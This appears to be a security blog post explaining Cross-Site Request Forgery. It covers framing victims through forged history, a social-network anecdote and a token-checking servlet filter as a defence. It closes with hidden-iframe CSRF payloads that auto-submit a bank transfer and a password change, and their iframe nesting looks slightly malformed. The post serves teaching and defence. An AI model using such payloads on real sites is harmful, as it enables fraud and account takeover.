You may protest, “I would never do such things!” My point is that through the use of Cross-Site Request Forgery, an attacker can populate your browser’s history with all kinds of unpleasant Web traffic. Not to mention that the requests would actually be originating from, and traveling through, your home or office network. In fact, if you are lured to a malicious page and stay on it for more than a brief period of time (perhaps to watch an interesting 10-minute video), an attacker can simulate real, human behavior by spacing out the incriminating requests so the traffic resembles that of someone actually clicking on links and spending time on questionable pages (rather than have all malicious requests placed in rapid succession).

“But wait,” you say, “isn’t there a way to distinguish CSRF traffic from legitimate user traffic?” Well, the malicious requests will likely have a ‘Referer’ header set to the URL of the page where the attacks originated from, such as: “Referer: http://attacker.example.com/csrfattack.php”; however, consider the following:

1. The ‘Referer’ header is not tracked in your browser’s history, so that won’t help you in court.
2. Although I’d need to actually research how much detail is tracked by ISPs, government agencies, etc., I suspect that the ‘Referer’ is among the lesser-tracked items.  Besides, even if ‘Referer’ is tracked, an investigation would still be required to determine that the traffic was spoofed, and that’s a headache all on its own.
3. It may be possible to spoof the ‘Referer’ header by exploiting flaws in common technologies such as Java or Flash.
4. It is trivial to strip the ‘Referer’ altogether (kudos to Jeremiah Grossman for the tip).

The bottom line is, falling victim to this kind of CSRF attack can, at the very least, be an enormous inconvenience and a hassle to clear up. At its worst, being framed in this way − even if you’re eventually shown to be innocent − could destroy your reputation, your marriage, your career. False accusations can tarnish even the most innocent person’s reputation, especially if that person is a prominent figure and the media gets involved.

We live in an amazing age where information − and especially “news” − spreads like wildfire. With social media apps connecting billions of people worldwide − I’m thinking of Twitter in particular − breaking news can hit your cell phone before it even crosses a news anchor’s desk. If a celebrity, politician, or other public figure were to be targeted by this type of CSRF attack, his or her life could become exceedingly complicated − very quickly.

Consider the upcoming 2012 election: Such an attack could be just what a candidate needs to derail an opponent’s campaign progress. By the time the victim could prove the allegations false, the election could be long over!

Our world is rapidly changing, and each new generation becomes even more submerged in the technological realm than the one before. The more immersed in technology we become as a society, the more sophisticated and damaging attacks on our privacy and personal information will become. For example, it’s only a matter of time before hackers start getting into your fridge.

How long have you been reading this post? Five, maybe ten minutes? Did you switch over to another tab for a while half-way through? Or maybe you got up for a bit to get some food? Better check your browser history… you never know when − or from where − a CSRF attack might originate…

My First CSRF

My First Cross-Site Request Forgery Experience

A while back I was sifting through the posts of my friends on one of today’s popular social networking sites when I saw an odd video called “baby elephant giving birth” – or something to that effect – posted by several of my friends. This tingled my security-spidey senses. I knew something wasn’t legit, but I didn’t know exactly what. I decided to get on an old desktop I rarely use to check it out.

This is what happened: I click the link and am warned that I’m leaving the safety of socialnetworksite.com. The video opens in a new tab and begins to play. I close the tab and return to my profile to see that I had now posted “baby elephant giving birth” for all of my friends to see. I was a victim of CSRF.

How This Happened

When I originally logged into socialnetworksite.com, it stored my authenticated session within a cookie, and from then on the site would use that cookie to verify that I was authorized. When I left socialnetworksite.com and loaded the new page, evilsite.example.com, a piece of script embedded on the evilsite.example.com page executed upon loading. That script contained a POST request to socialnetworksite.com that posted the baby elephant video to my profile. Because the POST request was sent from my browser, the server checked my browser’s cookies to make sure that I was authorized to make that request, and I was.

How to Protect Against This Occurring as a Developer

The most common and effective form of CSRF protection is a randomly generated token that is assigned at the beginning of each session and expires at the end of the active session. You can also generate and expire CSRF tokens for each POST. Some sites use the Viewstate property in ASP.NET, but because a Viewstate just records the input data of a form, an attacker can potentially guess what those inputs would be. Granted, a Viewstate is better than no protection at all, but a randomly generated CSRF token is just as easy to implement and much more effective.
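
To make the idea concrete, here is a minimal, hypothetical sketch of a per-session token check written as a Java Servlet filter (the filter class and the “csrfToken” parameter name are ours, not any particular framework’s). Real applications would typically lean on their framework’s built-in CSRF protection instead:

import java.io.IOException;
import java.security.SecureRandom;
import java.util.Base64;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;

public class CsrfTokenFilter implements Filter {

    private static final SecureRandom RANDOM = new SecureRandom();

    public void init(FilterConfig config) { }

    public void destroy() { }

    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest request = (HttpServletRequest) req;
        HttpServletResponse response = (HttpServletResponse) res;
        HttpSession session = request.getSession();

        // Generate one random token per session; pages embed it in a hidden form field.
        String token = (String) session.getAttribute("csrfToken");
        if (token == null) {
            byte[] bytes = new byte[32];
            RANDOM.nextBytes(bytes);
            token = Base64.getUrlEncoder().withoutPadding().encodeToString(bytes);
            session.setAttribute("csrfToken", token);
        }

        // Reject state-changing requests that don't echo the token back.
        if ("POST".equalsIgnoreCase(request.getMethod())
                && !token.equals(request.getParameter("csrfToken"))) {
            response.sendError(HttpServletResponse.SC_FORBIDDEN, "Invalid CSRF token");
            return;
        }
        chain.doFilter(req, res);
    }
}

Because the attacker’s page cannot read the victim’s token, the forged POST from evilsite.example.com arrives without it and is rejected.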

Note: If there is Cross-Site Scripting on the same site, the token is irrelevant, because the attacker can read it out of the page (or your cookies) and make whatever authenticated requests he chooses.

How to Avoid This Occurring as a User

Never click on untrusted or unfamiliar links. Make sure that any sensitive websites you access – your email, banking accounts, etc. – are used in their own browser and kept separate from any other Web surfing.

For a description of how WhiteHat Security detects CSRF, check out Arian Evans’ blog at https://blog.whitehatsec.com/tag/csrf/.

So even though my example of CSRF was relatively harmless, the attack could have just as easily been directed towards a banking website to transfer money. Let’s say I open a link from an email while currently having an active session at “bigbank.com”.

For transferring money, bigbank.com may have a form that looks something like this on its website:

<form name="legitForm" action="/transfer.php" method="POST">
<b>From account:</b> <input name="transferFrom" value="" type="text">
<br>To account: <input name="transferTo" value="" type="text">
<br>Amount: <input name="amount" value="" type="text">
<span><input name="transfer" value="Transfer" type="submit"></span>
</form>

When you fill out and submit the legitForm, the browser sends a POST request to the server that looks something like this:

POST /transfer.php HTTP/1.1
Host: bigbank.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Cookie: PHPSESSID=htg1assvnhfegbsnafgd9ie9m1; username=JoeS; minshare=1;
Content-Type: application/x-www-form-urlencoded
Content-Length: 67

transferFrom=111222&transferTo=111333&amount=1.00&transfer=Transfer

Neither of the previous code snippets is relevant to the user, but they DO give the attacker the structure to build his own evil POST request containing his account information. The attacker embeds the following code on the website that you clicked on:

<iframe style="visibility: hidden" name="invisibleFrame">
<form name="stealMoney" action="http://bigbank.com/transfer.php" method="POST" target="invisibleFrame">
<input type="hidden" name="transferFrom" value="">  <!-- Problem? -->
<input type="hidden" name="transferTo" value="555666">
<input type="hidden" name="amount" value="1000000.00">
<input type="hidden" name="transfer" value="Transfer">
</form>
<script>document.stealMoney.submit();</script>
</iframe>

This code automatically creates and sends a POST request when the webpage is loaded. Not only does it not require any user action other than loading the website; there is also no indication to the user that a request was ever sent.

Now here’s another example, this time using a “change password” request instead. Let’s say I open a link from an email while currently having an active session at “bigbank.com”. Most likely, bigbank.com’s website will have a “Change User’s Password” form that looks something like this:

<form name="changePass" action="/changePassword.php" method="POST">
<b>New Password:</b> <input name="newPass" value="" type="text">
<br>Confirm Password: <input name="confirmPass" value="" type="text">
<span><input name="passChange" value="Change" type="submit"></span>
</form>

When you fill out and submit the valid changePass form, the browser sends a POST request to the server that looks something like this:

POST /changePassword.php HTTP/1.1
Host: bigbank.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Cookie: PHPSESSID=htg1assvnhfegbsnafgd9ie9m1; username=JoeS; minshare=1;
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

newPass=iloveyou&confirmPass=iloveyou&passChange=Change

Again, while neither of the previous code snippets is relevant to the user, they DO give the attacker the structure to build his own evil POST request containing the information he wants to submit. The attacker embeds the following code on the website that you clicked on; then, when the page loads, the code executes:

<iframe style="visibility: hidden" name="invisibleFrame">
<form name="makePassword" action="http://bigbank.com/changePassword.php" method="POST" target="invisibleFrame">
<input type="hidden" name="newPass" value="Stolen!">
<input type="hidden" name="confirmPass" value="Stolen!">
<input type="hidden" name="passChange" value="Change">
</form>
<script>document.makePassword.submit();</script>
</iframe>

This code automatically creates and sends a POST request when the webpage is loaded. And, as in the example above, not only is no user action required other than loading the website, there is no indication to the user that a request was ever sent.